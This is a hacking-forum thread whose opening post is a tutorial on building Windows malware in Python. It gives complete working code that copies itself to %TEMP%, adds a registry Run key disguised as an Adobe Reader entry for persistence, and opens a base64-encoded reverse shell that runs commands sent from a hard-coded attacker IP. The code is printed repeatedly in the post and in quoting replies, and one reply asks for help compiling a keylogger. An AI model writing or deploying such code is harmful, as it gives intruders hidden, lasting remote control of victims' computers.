For Support and Advertisement you can contact  701491310 c0defire@xmpp.jp
Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[Tutorial] 0xC Python Tutorial: Python Malware
#1
Hidden Content:
You must reply to see links


This tutorial demonstrates some proof of concepts for creating malware using Python and PyInstaller.  In a previous tutorial we demonstrated how to compile a Python script as a Portable Executable(PE) using
Hidden Content:
You must reply to see links
  Now lets demonstrate some quick proof of concept code to do some malicious actions on a Windows host.
Coding the Malware:
One of the most common things you’ll find with malware is it wanting to gain persistence on the victim.  There are loads of ways to achieve persistence on Windows, one of the more common being to modify the following registry key: “Software\Microsoft\Windows\CurrentVersion\Run”.  Below is a quick screenshot of the Python code to copy the program to the %TEMP% directory and then make a registry modification so this code will execute when a user logs into the computer:


Code:
import sys, base64, os, socket, subprocess
from _winreg import *

def autorun(tempdir, fileName, run):
# Copy executable to %TEMP%:
   os.system('copy %s %s'%(fileName, tempdir))

# Queries Windows registry for key values
# Appends autorun key to runkey array
   key = OpenKey(HKEY_LOCAL_MACHINE, run)
   runkey =[]
   try:
       i = 0
       while True:
           subkey = EnumValue(key, i)
           runkey.append(subkey[0])
           i += 1
   except WindowsError:
       pass

# Set autorun key:
   if 'Adobe ReaderX' not in runkey:
       try:
           key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
           SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
           key.Close()
       except WindowsError:
           pass

Now that we have copied this file over to the %TEMP% directory, and setup persistence we can execute the next portion of the code, the reverse shell.  I leveraged a Python reverse shell released by
Hidden Content:
You must reply to see links
and made one modification — Base64 encode the network traffic:


Code:
def shell():
#Base64 encoded reverse shell
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect(('192.168.56.1', int(443)))
   s.send('[*] Connection Established!')
   while 1:
       data = s.recv(1024)
       if data == "quit": break
       proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
       stdout_value = proc.stdout.read() + proc.stderr.read()
       encoded = base64.b64encode(stdout_value)
       s.send(encoded)
       #s.send(stdout_value)
   s.close()

def main():
   tempdir = '%TEMP%'
   fileName = sys.argv[0]
   run = "Software\Microsoft\Windows\CurrentVersion\Run"
   autorun(tempdir, fileName, run)
   shell()

if __name__ == "__main__":
       main()
[*]

Now when this program executes it will open up a reverse shell back to the “attacker” which in this case is a hard coded IP in the script, but it could easily be domain, or maybe something in the Amazon cloud.  Below is a quick screen shot demonstrating the program executing on a Windows host and connecting back to the attacker.  You can notice the network traffic is base64 encoded:

Hidden Content:
You must reply to see links

Here is the full code:



Code:
import sys, base64, os, socket, subprocess
from _winreg import *

def autorun(tempdir, fileName, run):
# Copy executable to %TEMP%:
   os.system('copy %s %s'%(fileName, tempdir))

# Queries Windows registry for the autorun key value
# Stores the key values in runkey array
   key = OpenKey(HKEY_LOCAL_MACHINE, run)
   runkey =[]
   try:
       i = 0
       while True:
           subkey = EnumValue(key, i)
           runkey.append(subkey[0])
           i += 1
   except WindowsError:
       pass

# If the autorun key "Adobe ReaderX" isn't set this will set the key:
   if 'Adobe ReaderX' not in runkey:
       try:
           key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
           SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
           key.Close()
       except WindowsError:
           pass

def shell():
#Base64 encoded reverse shell
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect(('192.168.56.1', int(443)))
   s.send('[*] Connection Established!')
   while 1:
       data = s.recv(1024)
       if data == "quit": break
       proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
       stdout_value = proc.stdout.read() + proc.stderr.read()
       encoded = base64.b64encode(stdout_value)
       s.send(encoded)
       #s.send(stdout_value)
   s.close()

def main():
   tempdir = '%TEMP%'
   fileName = sys.argv[0]
   run = "Software\Microsoft\Windows\CurrentVersion\Run"
   autorun(tempdir, fileName, run)
   shell()

if __name__ == "__main__":
       main()
[*][*]


Drinks
Need help ! just ping me Blackhat
Jabber : c0defire@xmpp.jp
ICQ : 701491310

Reply
For Support and Advertisement you can contact  701491310 c0defire@xmpp.jp
#2
(09-04-2015, 08:06 PM)Codefire Wrote:  This tutorial demonstrates some proof of concepts for creating malware using Python and PyInstaller.  In a previous tutorial we demonstrated how to compile a Python script as a Portable Executable(PE) using   Now lets demonstrate some quick proof of concept code to do some malicious actions on a Windows host.
Coding the Malware:
One of the most common things you’ll find with malware is it wanting to gain persistence on the victim.  There are loads of ways to achieve persistence on Windows, one of the more common being to modify the following registry key: “Software\Microsoft\Windows\CurrentVersion\Run”.  Below is a quick screenshot of the Python code to copy the program to the %TEMP% directory and then make a registry modification so this code will execute when a user logs into the computer:



Code:
import sys, base64, os, socket, subprocess
from _winreg import *

def autorun(tempdir, fileName, run):
# Copy executable to %TEMP%:
   os.system('copy %s %s'%(fileName, tempdir))

# Queries Windows registry for key values
# Appends autorun key to runkey array
   key = OpenKey(HKEY_LOCAL_MACHINE, run)
   runkey =[]
   try:
       i = 0
       while True:
           subkey = EnumValue(key, i)
           runkey.append(subkey[0])
           i += 1
   except WindowsError:
       pass

# Set autorun key:
   if 'Adobe ReaderX' not in runkey:
       try:
           key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
           SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
           key.Close()
       except WindowsError:
           pass

Now that we have copied this file over to the %TEMP% directory, and setup persistence we can execute the next portion of the code, the reverse shell.  I leveraged a Python reverse shell released by  and made one modification — Base64 encode the network traffic:



Code:
def shell():
#Base64 encoded reverse shell
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect(('192.168.56.1', int(443)))
   s.send('[*] Connection Established!')
   while 1:
       data = s.recv(1024)
       if data == "quit": break
       proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
       stdout_value = proc.stdout.read() + proc.stderr.read()
       encoded = base64.b64encode(stdout_value)
       s.send(encoded)
       #s.send(stdout_value)
   s.close()

def main():
   tempdir = '%TEMP%'
   fileName = sys.argv[0]
   run = "Software\Microsoft\Windows\CurrentVersion\Run"
   autorun(tempdir, fileName, run)
   shell()

if __name__ == "__main__":
       main()
[*]

Now when this program executes it will open up a reverse shell back to the “attacker” which in this case is a hard coded IP in the script, but it could easily be domain, or maybe something in the Amazon cloud.  Below is a quick screen shot demonstrating the program executing on a Windows host and connecting back to the attacker.  You can notice the network traffic is base64 encoded:


Here is the full code:



Code:
import sys, base64, os, socket, subprocess
from _winreg import *

def autorun(tempdir, fileName, run):
# Copy executable to %TEMP%:
   os.system('copy %s %s'%(fileName, tempdir))

# Queries Windows registry for the autorun key value
# Stores the key values in runkey array
   key = OpenKey(HKEY_LOCAL_MACHINE, run)
   runkey =[]
   try:
       i = 0
       while True:
           subkey = EnumValue(key, i)
           runkey.append(subkey[0])
           i += 1
   except WindowsError:
       pass

# If the autorun key "Adobe ReaderX" isn't set this will set the key:
   if 'Adobe ReaderX' not in runkey:
       try:
           key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
           SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
           key.Close()
       except WindowsError:
           pass

def shell():
#Base64 encoded reverse shell
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect(('192.168.56.1', int(443)))
   s.send('[*] Connection Established!')
   while 1:
       data = s.recv(1024)
       if data == "quit": break
       proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
       stdout_value = proc.stdout.read() + proc.stderr.read()
       encoded = base64.b64encode(stdout_value)
       s.send(encoded)
       #s.send(stdout_value)
   s.close()

def main():
   tempdir = '%TEMP%'
   fileName = sys.argv[0]
   run = "Software\Microsoft\Windows\CurrentVersion\Run"
   autorun(tempdir, fileName, run)
   shell()

if __name__ == "__main__":
       main()
[*]

[*]


Drinks
Reply
#3
sven is dumber than stevie wonders eyesight
Reply
#4
thanks for sharing bro
Reply
#5
Interesting from script to executable lol, thx.
[Image: Jigoku_Shoujo_Futakomori_-64165-65297-1.jpg]
Dance3 Visit my blogs --> K28Dance3
Archived from Extinction
Blackhat Blackhat Blackhat
Reply
#6
(09-04-2015, 08:06 PM)Codefire Wrote:  This tutorial demonstrates some proof of concepts for creating malware using Python and PyInstaller.  In a previous tutorial we demonstrated how to compile a Python script as a Portable Executable(PE) using   Now lets demonstrate some quick proof of concept code to do some malicious actions on a Windows host.
Coding the Malware:
One of the most common things you’ll find with malware is it wanting to gain persistence on the victim.  There are loads of ways to achieve persistence on Windows, one of the more common being to modify the following registry key: “Software\Microsoft\Windows\CurrentVersion\Run”.  Below is a quick screenshot of the Python code to copy the program to the %TEMP% directory and then make a registry modification so this code will execute when a user logs into the computer:


Code:
import sys, base64, os, socket, subprocess
from _winreg import *

def autorun(tempdir, fileName, run):
# Copy executable to %TEMP%:
   os.system('copy %s %s'%(fileName, tempdir))

# Queries Windows registry for key values
# Appends autorun key to runkey array
   key = OpenKey(HKEY_LOCAL_MACHINE, run)
   runkey =[]
   try:
       i = 0
       while True:
           subkey = EnumValue(key, i)
           runkey.append(subkey[0])
           i += 1
   except WindowsError:
       pass

# Set autorun key:
   if 'Adobe ReaderX' not in runkey:
       try:
           key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
           SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
           key.Close()
       except WindowsError:
           pass

Now that we have copied this file over to the %TEMP% directory, and setup persistence we can execute the next portion of the code, the reverse shell.  I leveraged a Python reverse shell released by  and made one modification — Base64 encode the network traffic:


Code:
def shell():
#Base64 encoded reverse shell
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect(('192.168.56.1', int(443)))
   s.send('[*] Connection Established!')
   while 1:
       data = s.recv(1024)
       if data == "quit": break
       proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
       stdout_value = proc.stdout.read() + proc.stderr.read()
       encoded = base64.b64encode(stdout_value)
       s.send(encoded)
       #s.send(stdout_value)
   s.close()

def main():
   tempdir = '%TEMP%'
   fileName = sys.argv[0]
   run = "Software\Microsoft\Windows\CurrentVersion\Run"
   autorun(tempdir, fileName, run)
   shell()

if __name__ == "__main__":
       main()
[*]

Now when this program executes it will open up a reverse shell back to the “attacker” which in this case is a hard coded IP in the script, but it could easily be domain, or maybe something in the Amazon cloud.  Below is a quick screen shot demonstrating the program executing on a Windows host and connecting back to the attacker.  You can notice the network traffic is base64 encoded:


Here is the full code:



Code:
import sys, base64, os, socket, subprocess
from _winreg import *

def autorun(tempdir, fileName, run):
# Copy executable to %TEMP%:
   os.system('copy %s %s'%(fileName, tempdir))

# Queries Windows registry for the autorun key value
# Stores the key values in runkey array
   key = OpenKey(HKEY_LOCAL_MACHINE, run)
   runkey =[]
   try:
       i = 0
       while True:
           subkey = EnumValue(key, i)
           runkey.append(subkey[0])
           i += 1
   except WindowsError:
       pass

# If the autorun key "Adobe ReaderX" isn't set this will set the key:
   if 'Adobe ReaderX' not in runkey:
       try:
           key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
           SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
           key.Close()
       except WindowsError:
           pass

def shell():
#Base64 encoded reverse shell
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect(('192.168.56.1', int(443)))
   s.send('[*] Connection Established!')
   while 1:
       data = s.recv(1024)
       if data == "quit": break
       proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
       stdout_value = proc.stdout.read() + proc.stderr.read()
       encoded = base64.b64encode(stdout_value)
       s.send(encoded)
       #s.send(stdout_value)
   s.close()

def main():
   tempdir = '%TEMP%'
   fileName = sys.argv[0]
   run = "Software\Microsoft\Windows\CurrentVersion\Run"
   autorun(tempdir, fileName, run)
   shell()

if __name__ == "__main__":
       main()
[*]

[*]


Drinks
Reply
For Support and Advertisement you can contact  701491310 c0defire@xmpp.jp
#7
Hello great hackers and programmers,
I want know how possible
I can compile my keylogger
Using pyintaller, the final executate file
Seem to be pretty big,
Please how can i reduce the file size..
Reply
#8
I'll have to look into this
Reply
#9
looks nice... will give it a try
[Image: 1BCj8Dj.jpg]
Reply
#10
Thanks for this tutorial
Reply
 


Possibly Related Threads...
Thread Author Replies Views Last Post
  Auto-visit and custom click in python Canelrs 0 115 06-08-2017, 12:28 PM
Last Post: Canelrs
  script python caesarnur 1 881 12-28-2016, 08:33 AM
Last Post: nigger
  J00mla simplephotogallery component, automated sql injection script in python Codefire 0 1,144 04-16-2015, 09:26 PM
Last Post: Codefire

Forum Jump:


Users browsing this thread: 1 Guest(s)
For Support and Advertisement you can contact  701491310 c0defire@xmpp.jp

About Offensive Community

Offensive Community is a world best underground hacking forum that provides tutorials, latest hacking techniques, free tools and a great online teaching to our members. Join the forum Now.

Feel free to join our community.